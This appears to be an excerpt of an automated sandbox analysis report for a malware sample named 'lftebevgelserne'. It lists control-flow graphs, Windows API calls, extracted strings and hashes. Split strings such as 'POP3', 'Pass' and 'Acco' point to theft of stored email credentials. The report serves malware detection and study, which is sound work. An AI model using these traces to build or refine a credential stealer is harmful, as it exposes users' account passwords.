                                                      control_flow_graph 661 1f23173a-1f2317fe call 1f23c030 call 1f232c40 * 2 668 1f231803 call 1f231cca 661->668 669 1f231808-1f23180c 668->669 670 1f231812-1f231816 669->670 671 1f2319ad-1f2319b1 669->671 670->671 672 1f23181c-1f231837 call 1f231ede 670->672 675 1f23199f-1f2319ac call 1f231ee7 * 2 672->675 676 1f23183d-1f231845 672->676 675->671 677 1f231982-1f231985 676->677 678 1f23184b-1f23184e 676->678 680 1f231987 677->680 681 1f231995-1f231999 677->681 678->677 682 1f231854-1f231881 call 1f2344b0 * 2 call 1f231db7 678->682 684 1f23198a-1f23198d call 1f232c40 680->684 681->675 681->676 695 1f231887-1f23189f call 1f2344b0 call 1f231db7 682->695 696 1f23193d-1f231943 682->696 690 1f231992 684->690 690->681 695->696 712 1f2318a5-1f2318a8 695->712 698 1f231945-1f231947 696->698 699 1f23197e-1f231980 696->699 698->699 701 1f231949-1f23194b 698->701 699->684 703 1f231961-1f23197c call 1f2316aa 701->703 704 1f23194d-1f23194f 701->704 703->690 707 1f231951-1f231953 704->707 708 1f231955-1f231957 704->708 707->703 707->708 709 1f231959-1f23195b 708->709 710 1f23195d-1f23195f 708->710 709->703 709->710 710->699 710->703 713 1f2318c4-1f2318dc call 1f2344b0 call 1f231db7 712->713 714 1f2318aa-1f2318c2 call 1f2344b0 call 1f231db7 712->714 713->681 723 1f2318e2-1f23193b call 1f2316aa call 1f2315da call 1f232c40 * 2 713->723 714->713 714->723 723->681
                                                      APIs
                                                        • Part of subcall function 1F231CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F231D1B
                                                        • Part of subcall function 1F231CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1F231D37
                                                        • Part of subcall function 1F231CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F231D4B
                                                      • _strlen.LIBCMT ref: 1F231855
                                                      • _strlen.LIBCMT ref: 1F231869
                                                      • _strlen.LIBCMT ref: 1F23188B
                                                      • _strlen.LIBCMT ref: 1F2318AE
                                                      • _strlen.LIBCMT ref: 1F2318C8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _strlen$File$CopyCreateDelete
                                                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                      • API String ID: 3296212668-3023110444
                                                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                      • Instruction ID: 85c21fdb567a7790880a93fb6b47c620753b9b89aa8b05ea687202e08d5fce5c
                                                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                      • Instruction Fuzzy Hash: 8F6124F9D00319AFEF11CBA4CC40BDEB7B9AF0D305F204496D244AB298EB706A45CB52

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID: %m$~$Gon~$~F@7$~dra
                                                      • API String ID: 4218353326-230879103
                                                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                      • Instruction ID: fd2508e6a04e5b25c089b8cd7ebaef056af1ce9c2febf82feb206e60d5f5f512
                                                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                      • Instruction Fuzzy Hash: 1E7115F9D043695BCB11DBB49894ADF7BFC9F0D202F2044E6D644E7241E674A785CBA0

                                                      Control-flow Graph

                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                      • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                      • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                      • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                      APIs
                                                      • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,00405EDC,?,?), ref: 00405D58
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405EDC,?,?), ref: 00405D7C
                                                      • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                      • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                      • wsprintfA.USER32 ref: 00405DC0
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                      • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00405BF3
                                                        • Part of subcall function 00405BEF: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00434000,00403500,?), ref: 00405C15
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                      • API String ID: 222337774-899692902
                                                      • Opcode ID: fead4649acd3605223ce044578c367a532c9712ac73623ad44c2f3d2ee62ccb9
                                                      • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                      • Opcode Fuzzy Hash: fead4649acd3605223ce044578c367a532c9712ac73623ad44c2f3d2ee62ccb9
                                                      • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                      • lstrcmpiW.KERNEL32(004271A0,004226E8,00000000,?,?), ref: 004046E0
                                                      • lstrcatW.KERNEL32(?,004271A0), ref: 004046EC
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                        • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406311
                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,75573420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406325
                                                        • Part of subcall function 004062AE: CharPrevW.USER32(?,?,75573420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406338
                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,?,004206B8,?,?,000003FB,?), ref: 004047C1
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                        • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                        • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                                        • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: A$&B
                                                      • API String ID: 2624150263-2586977930
                                                      • Opcode ID: 833f58d89de2f81fb1f01f1908bf740233fe299cde34ef739fcabdfbf8a79f2f
                                                      • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                                      • Opcode Fuzzy Hash: 833f58d89de2f81fb1f01f1908bf740233fe299cde34ef739fcabdfbf8a79f2f
                                                      • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 1F237D06
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F2390D7
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F2390E9
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F2390FB
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F23910D
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F23911F
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F239131
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F239143
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F239155
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F239167
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F239179
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F23918B
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F23919D
                                                        • Part of subcall function 1F2390BA: _free.LIBCMT ref: 1F2391AF
                                                      • _free.LIBCMT ref: 1F237CFB
                                                        • Part of subcall function 1F23571E: HeapFree.KERNEL32(00000000,00000000,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?), ref: 1F235734
                                                        • Part of subcall function 1F23571E: GetLastError.KERNEL32(?,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?,?), ref: 1F235746
                                                      • _free.LIBCMT ref: 1F237D1D
                                                      • _free.LIBCMT ref: 1F237D32
                                                      • _free.LIBCMT ref: 1F237D3D
                                                      • _free.LIBCMT ref: 1F237D5F
                                                      • _free.LIBCMT ref: 1F237D72
                                                      • _free.LIBCMT ref: 1F237D80
                                                      • _free.LIBCMT ref: 1F237D8B
                                                      • _free.LIBCMT ref: 1F237DC3
                                                      • _free.LIBCMT ref: 1F237DCA
                                                      • _free.LIBCMT ref: 1F237DE7
                                                      • _free.LIBCMT ref: 1F237DFF
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 5f827bd9973758a34b912c60fa34846d1d14a74a5d914de2b5c57425036f36eb
                                                      • Instruction ID: 764ff5b94c8b67e88b1c3dfecbf6b8c1b00cc5df6fb6ebba1571f098eb5651a0
                                                      • Opcode Fuzzy Hash: 5f827bd9973758a34b912c60fa34846d1d14a74a5d914de2b5c57425036f36eb
                                                      • Instruction Fuzzy Hash: 7431AFF1E1834ADFEF118A78D841BA677E9EF48212F204529E849DB554DF30F981CB11
                                                      APIs
                                                      • GetVersion.KERNEL32(00000000,004216C8,?,004051B0,004216C8,00000000,00000000,?), ref: 004060FF
                                                      • GetSystemDirectoryW.KERNEL32(004271A0,00000400), ref: 0040617D
                                                      • GetWindowsDirectoryW.KERNEL32(004271A0,00000400), ref: 00406190
                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                      • SHGetPathFromIDListW.SHELL32(?,004271A0), ref: 004061DA
                                                      • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                      • lstrcatW.KERNEL32(004271A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                      • lstrlenW.KERNEL32(004271A0,00000000,004216C8,?,004051B0,004216C8,00000000,00000000,?), ref: 00406263
                                                      Strings
                                                      • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040614B
                                                      • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406203
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 900638850-730719616
                                                      • Opcode ID: 72ae88432d73e88ed5369f503f10eb86e637b299afe91f447cbcbe3ad5255a4c
                                                      • Instruction ID: f6a8a8a7a7034b932088a9542e42f1195f789c387e9fc15d08c952313e2c7fd4
                                                      • Opcode Fuzzy Hash: 72ae88432d73e88ed5369f503f10eb86e637b299afe91f447cbcbe3ad5255a4c
                                                      • Instruction Fuzzy Hash: 5C612671A00105EBDF209F64CC40AAE37A5BF51314F52817FE916BA2E1D73D8AA2CB5D
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                      • GetModuleFileNameW.KERNEL32(00000000,00437800,00000400,?,?,00434000,00403500,?), ref: 00402E1B
                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNEL32(00000003,00402E2E,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00405BF3
                                                        • Part of subcall function 00405BEF: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,00434000,00403500,?), ref: 00405C15
                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,00435800,00435800,00437800,00437800,80000000,00000003,?,?,00434000,00403500,?), ref: 00402E67
                                                      Strings
                                                      • Error launching installer, xrefs: 00402E3E
                                                      • Inst, xrefs: 00402ED3
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
                                                      • Null, xrefs: 00402EE5
                                                      • soft, xrefs: 00402EDC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 4283519449-527102705
                                                      • Opcode ID: 850620337695c7023bdab0e7163ca5c9099db9983bf24f25e96f826daa09d327
                                                      • Instruction ID: 8ad5d6c736a045239d332ae2f481ce07f868331e1a87cba88ca9eb01e54a75c5
                                                      • Opcode Fuzzy Hash: 850620337695c7023bdab0e7163ca5c9099db9983bf24f25e96f826daa09d327
                                                      • Instruction Fuzzy Hash: 0651E671940206ABDB209F64DE89B9E7BB8EB04394F10407BF904B72D1C7BC9D419BAD
                                                      APIs
                                                      • _free.LIBCMT ref: 1F2359EA
                                                        • Part of subcall function 1F23571E: HeapFree.KERNEL32(00000000,00000000,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?), ref: 1F235734
                                                        • Part of subcall function 1F23571E: GetLastError.KERNEL32(?,?,1F23924F,?,00000000,?,00000000,?,1F239276,?,00000007,?,?,1F237E5A,?,?), ref: 1F235746
                                                      • _free.LIBCMT ref: 1F2359F6
                                                      • _free.LIBCMT ref: 1F235A01
                                                      • _free.LIBCMT ref: 1F235A0C
                                                      • _free.LIBCMT ref: 1F235A17
                                                      • _free.LIBCMT ref: 1F235A22
                                                      • _free.LIBCMT ref: 1F235A2D
                                                      • _free.LIBCMT ref: 1F235A38
                                                      • _free.LIBCMT ref: 1F235A43
                                                      • _free.LIBCMT ref: 1F235A51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 2c3113daa63b454deded4145b77db46eb65d18acbeb9f64865818f3240551bba
                                                      • Instruction ID: 961de588c568d99cc5dab9789347f83e9c3df26644bb5d3f2d43d165b03af117
                                                      • Opcode Fuzzy Hash: 2c3113daa63b454deded4145b77db46eb65d18acbeb9f64865818f3240551bba
                                                      • Instruction Fuzzy Hash: F911A4FE920249EFCB11DF54C842CDD3FA5EF48251B5540A1B90C8FA29DA31FB519B81
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                      • API String ID: 3527080286-3064271455
                                                      • Opcode ID: 87e32d14d93f41c4202233a480bf15fbfa185bdc78fcd8ac01ffbb73c499ca3e
                                                      • Instruction ID: 4473da19460efdd6d182a3963d4f43a563a011a7c25d95ed983f5ffb8da867dd
                                                      • Opcode Fuzzy Hash: 87e32d14d93f41c4202233a480bf15fbfa185bdc78fcd8ac01ffbb73c499ca3e
                                                      • Instruction Fuzzy Hash: 35518CF9D0060ACBCF00CFA4D9885DCBBB1FB0D312F6046A5E482AB654DB769A24CF15
                                                      APIs
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F231D1B
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 1F231D37
                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F231D4B
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F231D58
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F231D72
                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F231D7D
                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 1F231D8A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
                                                      • Associated: 00000005.00000002.3974120013.000000001F230000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000005.00000002.3974171402.000000001F246000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_1f230000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                      • String ID:
                                                      • API String ID: 1454806937-0
                                                      • Opcode ID: 716695af9db91c4067f57fc47244fa7c2786b16c9aea462cea923be3d48cc970
                                                      • Instruction ID: 87e2d74e79b22c823bdb042f812eaed1efe20a62a2ae099f969420d869c8cee6
                                                      • Opcode Fuzzy Hash: 716695af9db91c4067f57fc47244fa7c2786b16c9aea462cea923be3d48cc970
                                                      • Instruction Fuzzy Hash: 432136F5D4122CAEEB10DBA08CCCFEA76BCEB0D765F5009A5F511D2140E6B19E968A70
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                      • GetSysColor.USER32(00000000), ref: 0040417E
                                                      • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                                      • SetBkMode.GDI32(?,?), ref: 00404196
                                                      • GetSysColor.USER32(?), ref: 004041A9
                                                      • SetBkColor.GDI32(?,?), ref: 004041B9
                                                      • DeleteObject.GDI32(?), ref: 004041D3
                                                      • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3957970125.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000005.00000002.3957907247.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958046175.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958064377.0000000000409000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.0000000000448000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.3958094050.000000000048A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                      • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                                      • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                      • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,1F239C07,?,00000000,?,00000000,00000000), ref: 1F2394D4
                                                      • __fassign.LIBCMT ref: 1F23954F
                                                      • __fassign.LIBCMT ref: 1F23956A
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 1F239590
                                                      • WriteFile.KERNEL32(?,?,00000000,1F239C07,00000000,?,?,?,?,?,?,?,?,?,1F239C07,?), ref: 1F2395AF
                                                      • WriteFile.KERNEL32(?,?,?,1F239C07,00000000,?,?,?,?,?,?,?,?,?,1F239C07,?), ref: 1F2395E8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.3974171402.000000001F231000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F230000, based on PE: true
